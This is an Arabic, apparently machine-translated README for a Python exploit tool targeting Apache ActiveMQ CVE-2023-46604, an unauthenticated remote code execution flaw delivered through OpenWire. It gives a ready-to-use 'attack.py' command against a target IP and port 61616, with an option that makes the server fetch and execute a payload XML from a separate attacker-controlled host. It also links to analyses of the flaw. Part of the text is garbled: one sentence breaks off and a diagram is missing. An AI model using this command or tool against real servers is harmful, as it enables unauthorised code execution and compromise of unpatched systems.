
استغلال تنفيذ التعليمات البرمجية عن بُعد مبني على Python لـ Apache ActiveMQ CVE-2023-46604، يستخدم بروتوكول OpenWire لتسليم حمولات XML لـ RCE غير مصادق عليه.
هذا المشروع هو إعادة كتابة exp من مشروع https://github.com/X1r0z/ActiveMQ-RCE إلى إصدار python من exp.
python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616
حيث أن المعامل -p الافتراضي هو المنفذ الافتراضي لـ activeMQ. المعامل -x يجب إضافة بادئة البروتوكول.
هنا نرفق رسمًا توضيحيًا لبروتوكول openwire ليكون واضحًا. فيما يلي تنسيق حزمة البيانات من نوع .
Throwable
انظر المقالات المرجعية أدناه لتحليل الثغرة المحدد.
# تحليل بروتوكول openwire
https://github.com/X1r0z
https://activemq.apache.org/openwire-version-2-specification
# تحليل مبدأ ثغرة CVE
https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/